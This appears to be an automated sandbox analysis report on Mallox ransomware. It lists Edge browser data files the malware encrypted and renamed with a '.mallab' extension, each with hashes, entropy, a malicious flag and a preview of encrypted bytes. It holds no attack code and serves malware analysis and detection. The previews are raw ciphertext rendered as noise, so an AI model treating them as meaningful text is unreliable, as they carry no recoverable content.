                    Preview:....9.R.v$.#4.......`..?:.Lp.v}F...(.)0..F..*... 4...la..].a.Q$."et...^.g..g.. ..@.w.>.Y.C....I.l......?Y.)...L.K..i.&.Y.R..D..T.H..g.j.(.SZ..B..!.5V!-.....n....4.T..ZD.m.2....\.M..;...jL.....|............_.'E93...KR..]AM.4,...K.`.]{zY-f.y.....|....G;af.>.. .[.zF...k.).tG\:.m...........~.c.bI.5a..3.)P...cKvn..Pf..yS.F.]..pD.k<8.M...:2....P.{.....K....y.RV..+K4Q..8A0j..e.?.....Y..J.......+.7..}....d.Yt..-T.s.W..O........Ou.......ZX.~...Rp.6-m...c._...qD.x....1.....oU{1.w..?.....^./..RIx.R.....d.w..B.s......Q'.B.r....o.o....Y.........z8...B0.v .lki....#.!...L))......v..f. .(..k..%2;...<.@v...v..K.-yc.M........f~...Cw....i*8...zT.....s.X).....j.l...16q...m.........W.f..tw....t<Ay.w$.......)X..1.$.<....g._.$75.N.c(k]Wk....,.E.AAdd.......4..T..Y."...G...\......1g;c..Dp.....@..I....P.....|..lw..g...(R.|.n..<...5SY;..bl...1......P....$...gt.G.......*L.&.R.Ss..9\_6..J..._.V......... ..4....@..C6.).g..D...T..^....6Y(.k.+d...M$..<.... :.0.u../A[...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\load_statistics.db-shm.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32876
                    Entropy (8bit):7.993789512665837
                    Encrypted:true
                    SSDEEP:768:W8O79MGwsW+CCopXbCckKEF3Rj6KuOAxDksuXQTAPv9sd8v2SNgCf+bAA6W3x8yZ:fa95WixFx6zOAxmQuv9sd8vL9StVx8yZ
                    MD5:1A1C012DD8582D38F0C32258A83C4937
                    SHA1:A4C643F8DD5BB9C35D7E165ED3FB517B34F2BF0D
                    SHA-256:A9DD75D662FEA029D3386F324DB91E244E81A9EB43EBFA9304CEC962A9DF5E03
                    SHA-512:168CD357A1BDCEF28F8F489A889FCD9CA10FA6FB214CE111037B9E41F0805DD95931725AC9FC62EB08CE5D6343A2C33345E0CFA5590F639A174D7511A1A5AB95
                    Malicious:true
                    Preview:.E..Z@..4..DB..j.......E.j:.oJ.q.e.d.H..G..0.[...S.....Z.".A.sB.(.....N..S..~.2;.............x.^-.L.G...3.....Q3i3..Q..v....5..)....a....:e../X....*.p(...H....!<..<.O.H.'.....6...>..U8.."0|;..F@a..-...k...?..l.x7......*_..#.d.]...oK..G..{..V.gR.j...b....$~.......f......B(`wC.. Gq..4a..p.}...xj.W.v...d7c........Fq....X...~....h..`.(..H..r...YQ..J...G.O.-".o............n.M..~.B...&...G<..D3.4...>t~O.].5$T..`.A......g~fN:N.....Le...Lr.3EN.<d.0l.b..V..Zs.t[........tm.:.......,...<T.......'.M.I.-.Y..|...n.G.`...+|.`..u.!H..yN.....`...y.=..m.S}.{..H...,6.#..\5x.!A......I..~t...6.....G...VZ..#DV.B4...k.ey..^......e..B[{......*....W..c*c.J.!1zp.........m.H.V.....D...8,OI.P...\V.\..l 1;..X..E`&K.]...B[...x..V0i,..9.b3.0.y.5n....B..|..?..CND..1.....5wGn..7A.fs)...*.},..e..Q.......w..#..aW..B.d4',K.t....}..-F...|...'."..W....~...n.u.....r.....k...A.......d.:1.".$$_...&.9O.,..'.n..}....'..._.....?#....bz..?.R.3..T..1..B..r...>..r. .c[:C....e..c.....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\load_statistics.db-wal.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):70180
                    Entropy (8bit):7.997275641920126
                    Encrypted:true
                    SSDEEP:768:PJ3Dz3XKo8ox7I+yKcXNb2AE2eho1I8CP137FJ7aYI44oghIA/73Gawths5turE5:Z64sXcKBy3137FJkagp/73t95AJlP1k
                    MD5:1EB7E33BE73B91FCCFF75172F5A706BF
                    SHA1:FE157F551C00262E03B86D8BAB12E0D4C7B399AF
                    SHA-256:4B20104587F9EBD4CD99DB09DD3BF336417754C3A02D99D7F56AFF0E2AF08425
                    SHA-512:8784BA522AC764D9CB0C098424AC2FA9D031E026112131FC6B0E60AADEABCB5D4967500B8A52AEA847F1FFEE92590F74EBF90D9AFCA3B58F8A38D12BC904C43D
                    Malicious:true
                    Preview:u....r..wsA.....&.....v..HV.......1V....*...]|Hxh.@...MX.G.....3...,GZ.w.. .eu.'...Wa..Z.W.IKu?.v.M..0;4.=-x.I..*...g'.sE.y$.=.]|j..|.!...n.:.#"K(`...b..sr:.^.....l..C.A....-k.<O.0q.ui...`....jV....:.0..0.r...>-..&.qzI.s.<9{...D.g.._...k.Y.l..5j.9..../3.;.......r[t}.yn.?..`....[.b..Z.f.\.^..r.f=..R......]W.-H,..[O....).....|ei<c@..-. ...yim...s.=....%?....~.#+x.....@.).'..G.....hoo...H..j.dA.L.0.5..G....ah...._.u^..[..0....b.U..Qm...ruYq{.N.y.ps<.N.2...JrT...i...tSb.K6....t".q..0C.Q..9...".I-.QfE?M.,..<.3.R&.O.+..(?.... ^./..G.....S....(Xe../.......sl.e.....]a$.sR.[jf._\.}r..v2?...o.^9.......M@.n....."...r.5..Z.6,....2O1P..s%..8nB...4U.$OtUd..V.glS...#.......A.....Y..r.4.dl$..&.h./..T?.[.$.)5..uK.N.................d...W?..>.%1$\%<..9.{.qOpY......@}.....m....<.d.Z.!.c.c|.f.z...........;.:k....2K.....3.}...@.R..^.....k.{..._..n..B.;..i.|.s..i:@.3J.L.Z..]....x...Zj..gk...<...0...Y....".D.....(.(.7n.wHq8si. JF.v.....>..M.c.dJ.i.....nDD..7...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\uu_host_config.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):398421
                    Entropy (8bit):7.999562114157628
                    Encrypted:true
                    SSDEEP:6144:mBifcqCIm3YYW5sHowVZlLDny74T+tLkLgpub8r6EGlBDdIR/kC/337XQhE:mBuIIIY15s3Dn44TOhuY+EGzAV337ghE
                    MD5:6CD912C4AFB3223C43D4693EE224F242
                    SHA1:3B670F242A51D81CDE6FA8E157D5B21DA9303FE6
                    SHA-256:C59378ECD3B952C45F93D6199AD52A7F172A1E9A31A4C73D24AF8E73EFAE43B0
                    SHA-512:9F030BBEA774757E4D0FE0FB2267FDFFDD361412D60FDFD37DD368EF9DA15639C6BA109B8E8DC39841742AA7F5F8D70E68D4D5C0ECB84353F73B802ACF301721
                    Malicious:true
                    Preview:.1.k.X..O;.....c..L.m..>...}..Q.R...Y;&...X..I.BC...?y.....V..%...Bx...T..........H...`.hT..O..CxNi..'....kT......$..UO.@(;......<Bl.....L.............O4...5.=....?O......(..fPNL..h....l...jd.F.[@L...g.....f.4.....@.........4...E...Rt...#....-.kC..rR..t.G._.(.....>..RB.F xf.....M_..[L:}.cM.6sy.,....c4.R...e..&..\.O.O.HSU.%.`./l/.@..g...,...p9f.n.qy..B...'..R..1!...a..?........(.m"7.."..p....z...I%.V...4..g.V....-^...{T.m....6....8:{..../b.........b.|E\.G.bk.~.M.;..;..8_........!.[/MQ.Z-z6f.[....&.3..../...A....[.L.......x['.[.J....?....D.F.3..|.=>........i..Y..G.]o|yo6_$..K^..F...r..|9..H..u.'D.5.tdz_...........^.b`2....,.g^..ux...M.9GK..B....#./)./N0.^)..GT9."...US.....*..."7.P*.O..|.kZ...I...! ;.....c[.b.....UN.ug..=&.MU.j.r..T.P..1!?c....}.L.3-..{a.0........6]....K.jvrK..X=-.'-......X.|vB.7J..^..t..d...C.4.....#Ico...K...._c.L.\.....9........9.4...X..w.s........oo."...t.s./.)^.Vg.6...;.+.S...^/....@..r?.:..S@..U.s.^.C!.r..;...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):80304
                    Entropy (8bit):7.9976793146197895
                    Encrypted:true
                    SSDEEP:1536:501L+Dvre6aEHVQVoZbPA3BAltjwjVrRS31HnPvXQVlCDaWb6DNcfnwV:501+jn4oRPwmMrRe1HPdb3nu
                    MD5:970C7925E404B954C63C37A1C5624C6D
                    SHA1:D5669D23CA9C4C5DDCEE3C1565C4193F7B1A594D
                    SHA-256:1D056C34FA3F87ECC8AD8ED9E7909AC30D0F6A1D2C9667D8610E76F72BA41CE8
                    SHA-512:6113E0EC782C9A8F838EF91CF2FF007F2E27E6ABC10F2379BAA231C936316B44F7016AB63F4F486153BD984A67943D0EF2D90ADF52755E8C1DFD825A971A3C06
                    Malicious:true
                    Preview:...mK.G.HyG\'.Y........!A.d.>.....[]....D..%JfzF.2l1:..l...~.O3=..h.IU.V..H.U.. ...*..OK...9..e.....=...xA}9.....Jl...#Z....e....f..?....J...;o.....}G.g.DG.G..R.m..N.z.$7=@.:...-.N.K.......%]L...[&;......X...^e...Kt.}a....(RP......-+*x....1..KK5..6[.Qw.et:.?&p<S...l....k.x.LM{...p....Iy:..9g.v#,<. ....jm.../+;.:......w....f.}..J..1.G...6.W.~...._.....U|..b.D...a......$k.3..l$Up......=.\".F.3.m.l.L.rb..p..b"QrQ.C.\...!+....c9.D.....(....`.=.+.W..n.3..Z.#...B.W[.tx.:.!...8]..&6C.*.....{.......$q......A.~.....!..T];"2.Y^V.v.>;-..c..P...R..W1CE..[.^2d....f...[4..%....c._. .qn...Kn..g...H..@1.~......x^...m..6d#.=....in.C5.!.O.`..2H..PZ.V..~z..2nY.j.D.&?.m. <Z.D[:D.m.RhQ....P...u.-.."4..(n....._..">..%.E...F...6.O8.#..l..9x.4e,...@aI8Rg...}6W...N..C^.h.0..k......7..?........Q.]....te..h.{.......Ki..' .\:F..&...9/....K.T.K...J..1?....-.....W...x.;..q.T........E.G....(..........|.SIT..X....HG.>sr.}p1.>x..b...!..........0.....u".+...|b..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\InputExtractor.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11675
                    Entropy (8bit):7.9847864410820035
                    Encrypted:false
                    SSDEEP:192:w22hOJTtE9rTmlWZ1ywDW59DpsAz9md70cb6RYqxs3tvA0mhfN:w22hOH2fLvgphIKcb1YN
                    MD5:FB92D362FBA494445E6F81E2A49A68C3
                    SHA1:E3711A64D47B44A4E18685F7B4CCFF5D68124E04
                    SHA-256:09D98434B8E9084F551CA3F3DAC966397B46E4516A1D44620472B9E367B288DD
                    SHA-512:AD63163742973549A07BD94079F5A0CF1DFAFA2C19AD6A890EA27EA4428C5E100CF0F9BA250A509D51DA529A5761DA0EB014160EE1AF4ADDE910DE66571CCB3A
                    Malicious:false
                    Preview:......'anUs.R.G\.jf.....-...v.n...g5_. ..........[.........N}..l.....e..&...,gc.?.lJ%Zt..^..t.MV@.jE2..I..%..y.{."...E..]...........5.......Vk.(.y/.H....:.UN.J.,1.b.:4..........C.._.......Q...KX..N....X.b..!.y.;x......d.$.S.r....2..F...|.-....~......*.z.........]..0.>Hi..`.?"..`..E...IE.[Z@.>#.V.w.&.V.....A%q..O.....S..h.z.5.D@.......(.{..n6.1;..........;.V...}6c..sJ....9..[@#liC.w....}..k..5...I..{...;.........op.<...*`M.+.n.`.!..1...].6.X.94.[ ...{....om4......{.d..&.<J.....h..hZ^...B.i..^......Z.Q....ql|.cKT....Q.!........o|...C1vz6.f....x.?S...t..BKA4...m.5.=.=.@.......aGa:.....2O;m.K.o:^.jr....2.Pm.:K..w...3...rH8.,.Ya..r.9o...a.w..F E..6Y%.7Ww..o..{....A.$`8#....yA.Ux..y.X..dI.r..V0....jk.-.._^._.9M..P......k.R..B.....O:..D .&E.Zf.#..i...ax....y{..|.o..C..#..f..K.."1`.*1.i....D{.3.c.m....._Ng.E..../#..8?p.."`.#X9I+..X.'.8*w... L.<..O.,N.7..?\H.>..C .>:*.[g.{..WC..y...6P.#..O..A0+....6...Z.....QV._'..T.....<....-.G.I..96...A

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1179056
                    Entropy (8bit):7.9998494359037045
                    Encrypted:true
                    SSDEEP:24576:MuYdGSlLqU1vw1l7WE3/Ur/Wwa4HxtUe92dqetCCsNRYLKlk7Amu:MuSGSLKAJreSxBLuCRoAmu
                    MD5:0B0805AAA7518BFDEC2819A03F037A99
                    SHA1:3397A406327D017A8F51044C99F13AF35A642CB6
                    SHA-256:0EC14D992B9B7454F128F7214503BB54D96D2CD8405B7C6BD5E4698166CF0DCA
                    SHA-512:6A7FBB170E07C7540F5AEDF7C856CB041DC1AEA69A3413D675F2B0517866FA69A9B848F4E8D91468FE75F0EE64D3D4BA2B9C9B51BCE4CA8AF96BB41930DF082C
                    Malicious:true
                    Preview:q.....-uW..<...).iB.b.1&..*Y..?\.......x. ...l...t...B....~..r2..'6.Z".%..q.`v..^...."B_..B..=..P..._#.L.?o....f.nN.......\g{.'.3\..]....l.A.{.9....M..u'.t.(..gQ.z....<l....W.....vm{..`..b.|.K.4!=...KP..}.?TcGv@Q..VP$<H...p.B'r1 ._;HQ`%N....SS.....{...x. I...r...r...Z.3..&..9...6.....z...v.in>.MU..".[Y;e.=[.^.P!!.a........&u.j...qv...e.g.........V.......@-g..%......+>:.{1....h.^mK.........C4!...O.HGq.FAK..L{......$|...Y.z.B..>.$._-b.<U...k.n...../M.....^....U...B...<..N.PQJ...9...z.....ulG.jv7/B`/p`.t.v.F....].n?#.|Xb.....\....Y..B............@:.."...oK^w<..T...e..... X..n....m...2../.`.a.S.dX.|S4Q..5..?iE...tc.....S...~..:NH....:..EFwC/{..h.IuG...DR....6.....?:.!z,.bP.:....8.[L.9=...5...., ...:.U.......\.H..L......%.3..X.....r..!./.}.h=Jy.n..!.&.E.../...~....{.,.Q6.[.%.Cm...*Vp..X(.Cz..9!..........ov.=.._m.......`.t.(.<.....!..8.........nR..c.T8.D.:.'V..z.q.........8.;.O...J......b.|.7...Lm..T.|...8_.~...i<..s....G..?..&......

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1010506
                    Entropy (8bit):7.999788334929347
                    Encrypted:true
                    SSDEEP:24576:q6teZuyVYWcK8ODY2pizyQEPsou5nW5yK:OZuijDBkoudW5yK
                    MD5:3D6FE79DA1555938260EC4138C51C426
                    SHA1:44BB2BBA2F7C7056A8190B4C7A2F621CCE9ACF8F
                    SHA-256:867D7AC54078710B53FDE1915CC869FB5B4D07929068180BC6FDA720704713C6
                    SHA-512:BD658741329032F7C4998D0D36E4AE711196A3C2B294AAC5AC7A5814E963DDF9E0B412443F91DA8140DEFFBA18E6132387706334A37C727E9F6871C7A850578A
                    Malicious:true
                    Preview:IL..E`e..n...dN.g.0..ZJ.9..}r"......n.IG...j.g.......s)q..G..g..v..."....Am`...ff?...r.6i...;.3..N)#.(...+"..|.S.........M.l...B..`...D9..o.1.sD.N.......Lg.s*....$1$.QJ.Y<.\..%z..`.....%.o......./....C.r...7..qYa.u.....+..'.3mzd.YC|..Z..k......+.*..`.......'....8..Y.d.~.....9H.Y......{./!x'.!....#..T..+.ej.B......X..S$C......p........m...[\U..!:..1.[9&'C(S./.1...!.u-.-%"'..^m0=.1.eU..q.......b..|.u..CnM....nV=*n..Yp......9.....=.j9.nM..)3......O......M.........p./......,...1.M..E..Z..J.uR.,.....i.R&. %1H...#0]Cm..1.5..v,.$Zr0H-.......4>....z.....D:.Y.C.{.fV.Pe+..T..`.>.....C.T..in.~. VWT:..?. ..&K..).....}..@(.+:...t.>.u<...m.}...wTZ....P7Y..J(..#....~..(n.?.o.$".@..! .Zx....7L..X.....Kx.........K-jhV..Y0.-.K...A...T..@....O}<..S`.Pp%d.c.y...[..B...40...HT.+u(.....}....x.).}.L...8......iD..R.$..~..JEz`.......k@.ADa.'=.X..,.'...t.u.~..Il. ..%....._Y.y...*..f.O.Ew......`{..[..r....!?. ..n..?.....<..Y...T..C............g.."qks...HB....f.y.PD

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1042011
                    Entropy (8bit):7.999847625084633
                    Encrypted:true
                    SSDEEP:24576:WRrAIiJsu6Tic2c2T6NErMpIlfES74oCOHfvkD37Uld:krA4LSSguOkD3w
                    MD5:8B4A0FD3C5742E02B98E3A1D796C726F
                    SHA1:50741D77EE31A01E82B8D4FB8EB56A57BE7E2CDF
                    SHA-256:488BF7141B2EC1C097E4B94BA26EF846D7B5CFFA68ADFE0E2380C057052E2B4A
                    SHA-512:49BC68789E07EA7A5455B966B96ECAFB1AC1605660A22795AE798198F500CEF8376BE4CA7F2F319C436D1F17505CAB2C3C95F415E2CC6342F878A0BCAEAA3069
                    Malicious:true
                    Preview:4......M.G.a...B...b.IN)...^..m..n`.q.....JV.."..$..ud.k...`..yUPc.^.KH+ ..OA...\...u.)..a..b`o.r....@J...fM..I.........@Q...W..{0.S.....+......:........y.\.+_....-...pC.......v....#5...?.@..I/^K.X.3'VSd=j2...........r....y.cX^^...\.i..]...KdZA.nf/...#...}.cO.W.....+BN..~-.].....q.9.j..BwQ..Q.=..>....9%7...*.=....0.....*...|V4.a.....<(C:.......l.e..Z7.R.9$?h......4.n.$.......U.3...2....*......+.VZ.{...^yq.u.6.V....*.-../..]...<..%.......b.^N..n...%.TE\......_....!...k.>H9.._...1&....7....W....'.y...n....\..^.J.+`.aU..R..Pw%!~.....K.%..\~.X...4.I...=.b..J....\>K)a.....s..........e.&.a."........0.e`=u>....{....h%i.....K....<oy....%....e;s.pY.../.$.;u....v.....*Yi+@B-UO>uY%&.w..n..L6.0.5%p.:..G.9B.........c..n.Q~...S.%...1B...y@.(T...{N...(a4by8"...;...f.W$1..[.>j6....w....r...2..A..Da.....9P.j....jx.5p(..m.....:6M.W...b.m.e''..:;.=!.w...R..M.....?.%...N....[..f....9.w..e.T.m...=....Q.;.qg..Ka..2Rr..1.K.tt..?.(6Ev..eV.-YO\aCF}^.[.R.U..(.KY8

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1680823
                    Entropy (8bit):7.999883050406671
                    Encrypted:true
                    SSDEEP:24576:DHK8Kdy1e3Bm0ySyKR7tLLgwsrYiAOCUlYndGAG63stQgPAAq2D0zlTP56onGlWy:DL/8B7VyKRpLkwsBNlYB0QgylTP8tXz
                    MD5:CC9265289C0BB8A2C78DA69F449D31D5
                    SHA1:EDCFC3E560B30F24F84A477FCA4071F76CEDE98F
                    SHA-256:4992B0DBFBBC92E533F2B0A371B082B99A666CCA0B6525AFFFD756399BABB641
                    SHA-512:C53138AC00205E7BB9BB48639A111BD536A4687F1A022A108B923C4FA9600F4E1F60B4953F0BC7B338CC9770314A7F0274BD48D2C018C47E99F8EF37B6C52459
                    Malicious:true
                    Preview:...~+......X...G.j..(.}~k.<...x.....qu....H.F!n..$./..V.y.......].b..=#b.....5a#ZP.........m,.D\y.e.#..A.:dF.../.r.7...=...Qm..T..;..}..:..Lh.....W<x..C}.aJ4...>..X@.8..VE..Q.boN..A2`o.'...l.s....G.....s..lF..rg............y.........`.1-.@.Q..I%.7..n.:.N..._......cC.Gh..^R"9.'.5K...(.......+.|...d.2.Y...g71.ty....Er.>=8.y^.u.....2..l._.....b.....$O.s!......s<...N...Kz1.4.U-.........(d.(}..|.+..<..E..O?.L..p_5...""....fd@...%...i....`.....*&..).w.o.p.f...T...C....F?.9....o.........er2.8J.<....g..P...G...p....V.%j@.....d.e.s`..6.......4.w.E.#.1vO...q/..<........#.CRu....N4.7c....yQ.iB..'.gK...m.....'._x...n.....;6\ a..20.\J....)..%J..\.g....1k.....+..p'e....C.....J-.I{".{Ff.#.x....d.0.a.../G.v..s:.o&xSH..Y.6...u....d.p.~.....0 |..L.`.K?.{L....b..P..v6...zp..5.A=.:....=.d......7..bB{zk.d.)7.bt..?..V. .k!t..{..)x./........K..j....V.nXM.,.p...q.}..8hw..eB.....:).'.Q............C..8.?N}.7.J.%..#....3W.{....... ..KS..{p.?G.9.Z|Ob.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):79895
                    Entropy (8bit):7.997757707590117
                    Encrypted:true
                    SSDEEP:1536:ds0vNdmeuIVoJwCWx/TpgenF47uAyiqYueW9GKr08FUf24rRLMDM78:eUAtIZ7pgenF47u/iBu+CLAaMg
                    MD5:BB087A5929AA22D39BC6D0E559528A3F
                    SHA1:E882B0187A54103C961DCF263A247AA54E0AF772
                    SHA-256:ED7A7738F32477D816D708160475BE77FDF720AB5C001AF0A129367F90B60E18
                    SHA-512:9DD4B0B2380349E9C654D094610CA8F574DDE29F3A54F54371778A9C412E9345DE9265F5FFC889AE5E80C04650B3EF14A410F9BFB8613C469029F0906F9342FB
                    Malicious:true
                    Preview:`[A.....Q.s.....p.K8....&..N.......).....L....ZlY..[.........A..K.U...;.z..g+@.8..X..K.... e_..no..0wx=.FBF..n.b...........-1!:c..JqnEI...qaV...(..."..*L;.....@..,N..].'.S.....'..-...E..J......./..g.A..m.........Z...AR...T..@M..b..lW.W..u..Z...... .c"..s.qm..u&.BB#.F...N6.N...p.$5....Fj.m.~K..f#.......%Ol'..q...QP.Z.. 56.. Fy...VR.B..X.vz.e..~..1....?k..H...K...g.p...Fr.@^n.._.+,X.I....@....>..P#=).E....2.".u../.p..h.R....G.I.....-...j....E...._w...tH..s.(.b\.OaeP'..}.s...e.y.R.......H..@.Y.w.y..B.I.2.P..)z..W.........eF.}.V.P.I7hU.$...z..{.{.8......m.{..#.Fa....'..#.4..........V...H.PS.+..M.Z.-`...$..x..w.F.2-.2c[2.u....`E4R^uw.4.....aE`.hv.G....D.G.X..j.38....?.X..,.k.B.Z;:M.=#.C,.u9-.JCeP.ZB..rt....2%..M.Z._...qt.j.........oe..y.-o.A...2m...RG..$A.<|....cg...........T...^y....FG..`.k...l.........U..d.f^+W.);.Tb&t1M\*......-#."..]`.d..?...FrR.{.\4.}E....:....J31..O.<V.....>....lF2.s..5/.....>........L.J>.+p..#;..............>OO.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):988423
                    Entropy (8bit):7.9998387802562245
                    Encrypted:true
                    SSDEEP:24576:p8iJn+MGRL5II3QKX8anjqP2DKdJRSwXsPhLn/ea2Yco1/Y/5:xoMGJlgydnWTJRSr/sPEq5
                    MD5:8998385ABA3C9417BBC0622789656B36
                    SHA1:7414559D1F8A9696276C2E9787029A969FE6AF4A
                    SHA-256:C3D77D91195E88357F7E236340E2677856FED0E81110BF150CA8826E5836E3D2
                    SHA-512:3BD077B9DCFC893D3DF553221321E8F317C41C849F918808D99CEBEF257CE416EC54DE0041A244EF43E6774D10328CFF88EF11374EEF39E60A6C5684BAF0FEA4
                    Malicious:true
                    Preview:..@Qp..o.x,].&.g;..y.E)i,..6Bqd.4.O...3.QE...Nx..-F...$...*......J..Zu.$DJ>.hDC}Et...[..\*..=...h...+.@.d=..D.."...OU.H\._.....j.j...N.!D>k....M..M.k,X......@...,..A~=|.6..;...1.).\.Z.a-.to...gT*RG.@p:.........-v....Tiv}a..*l...:}@.].co.....4Be.Qg...fPxC.dgS.....+k...<I..G..,..zb..R+.b..o..9...Fn.I2..B......d....?D..Ff..........Z$.4...vm.........R.e...?....9G;.3*4........].!....e ...6...12....sQ...{o.Cq+.[QW.pC..-.z..O..V.).P.....G..C........A.?/..:..:QO)G..rt....u......E..j.V ....Tfa.#.e.~f..........|...{.75....j.3).p.%.t<W.w...@...g.N..K..9.uz.g....C...6......A2..k.<{.V..8..(3..]3.-.....`..0.!.=-c...M}hA..L..Y...;.w.P......G.`..*..:N.#T....FT...Y.d.R..[......>.FF"A........-..G..Q.......4.3[.....&../...7.}]..D"...`...4...8,..sc3......_z......&m...q.0r...u7YO@~.1......x...|>..LW..4.o-....y...+NO7.......(7.a....B ../0.Op.fL$U?M...p..c..C..fwm2...-.[X7r<G3].......l..t.$....d'../yZ.-@.y.....fA......?l.9v4.'......n...>.So;9..z...G

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):5653377
                    Entropy (8bit):7.999964921070115
                    Encrypted:true
                    SSDEEP:98304:joN6KeFDnotgSTIFjMWJPc1BhruWbebb0+og96dVzoGzocIx2HYv:cNPeFzotgSTIBMW+1xbebbtJ96dVznkB
                    MD5:0F182756FFA16AB2C7BD770280DF020B
                    SHA1:335612183E5D4234F7971A5B296CEDABAEF9A3AA
                    SHA-256:53D29D8DCC3D2E76FF6308AD9B0DBED75C2E4D96FEB6BA6CBDE67D07A0B3872F
                    SHA-512:00927D979C95D7BE84D5939FB8A3A59CB2B5A6F08F9F34A612D4372A956FB4B82FD9469AF68939DA2AE733F54159FB634D50BC26B984A8FDC97BA7D0A2E52212
                    Malicious:true
                    Preview:a..H,/5...........*N.XS.==o.~....:Ru...<.....UQ...5...I.........6...!..4. ..|..m.%!?......+.IZ%s.&Zx[..k@k....Z..?..5-......V".....@->R1.0.c,..z.B..,..cg$$4N. f.V..]..#.i.+z..:.o*.X5L.M.W[r[.<.f....|.....y..,+[4..m.KHN...r....`}.@.........=....,!.l...>=.|.0..E..&$.n....i.....,<..*.d.5..0.....h..z"U..6...v...vw.}RT2J.D.m>1.G....hz.e.C~.6....e7........V[+U!81..YL...=uF:..JG..a..]..c..o@.;.P%....mH.|...H......a.!...!$.,....r6.E^...?.q...~..%........;....YI2..0...g~srdB.P..*L......:\..<gvZ}ed..~......N...E.yx..5......c.F0$..1.....L2W........f./..1.1..r.....!...8>p..w9X...y.Y..-^...{...boK"..>...x.......7.........1...G.D.}...5.S.....R..n...kBC.....~6Wj7.B.H.....y...k.........?...WE........Sr9..x........}<......'...I..g.._...S..k...H}.=...A..~.._.........(#...s[.g...B.N.....#..4...:..|_.\.:..`.....u...3..........c.T;I.*..".<..._7A....f.RV...w._.%.DW.^....,7. ..ID..6..$..['...$...T.....,.7V...>....`MA+.....m.@.`f=n..,.QyE...6..pB.........W..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping_iframe_driver.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12044
                    Entropy (8bit):7.9851039860582755
                    Encrypted:false
                    SSDEEP:192:tB0op8aIYWLaSulTJDIcphNziPUwd+fntCLS8Dig2bSyMsAfjv80rl5toOE4gqZ7:teo61YtBhNzSUwdWkLDmxYbUu5BE+DdT
                    MD5:94C004750A73F4E8F60AF46CC9EC9B92
                    SHA1:457DC3DE8DB760F0210D25A3988B8C84FF26C373
                    SHA-256:6DA24E332B38A9BE0F422B69A4C8B043DD8A90FD81C92477CA0D7489DFBC7E66
                    SHA-512:EDF2EB911592B5BE5B7A3B675A6E5501467DDCFD16A8FE3C31DE8806A55D82CB965A8C4001206C165DCDBD80CFABFD6D5650AF0E16DB983F808B547319772229
                    Malicious:false
                    Preview:@.u.nz.qW.:.~..............4..PR.E..cM.:..=j...+..&.V.z....@..L..;...V'.F..'r..4U4...S......2G=.g...|....+..F.....m..?...Q{..*......W........D...sX....^.f...y.v....'.6z%.._.2`....)4...(.6P54.<....T../6..9CV..N...)....\...E/.j!(8......Q1-<..F.U.t.....w..z......am...c.O ....jL.g.......MKy;8H...".h......O.W...`......].q......q:.@.^^....../M...`..x./vEa2"...F.......,...)..i.O.}f..|..T.B...r'....q...C."..|M v2.!.o:..+..w.OQ3K....!..@.."..o..J(....=H-.l53%!..\.C@.e !...@.c...#m.q../ ...OX8..\X..n\...?..,5...8.=X.I.>...'...t.H......^...m..$%X.]..=...l.+..q(..e},%......?."SH.. .....d_.^...._.f....."PA.."T........Oe....e....D.f... .s...a...#..2]....u......he...?.k&.cO.....j.....A..X^...,d;......YK....H..].M8......Z.....6S9................T.z."w..4.b..w.}.....&.,..a.+......3C..$....c..[.dH[..P.....5.>..V...8H.P..1....7et...k!K3N.w|.s..'P....$i....bL.=.q.F..rK...sH^pc.k..R.<;0L.......S._..0j^.........l...A......7.n....0..T.....V|J.\..u.

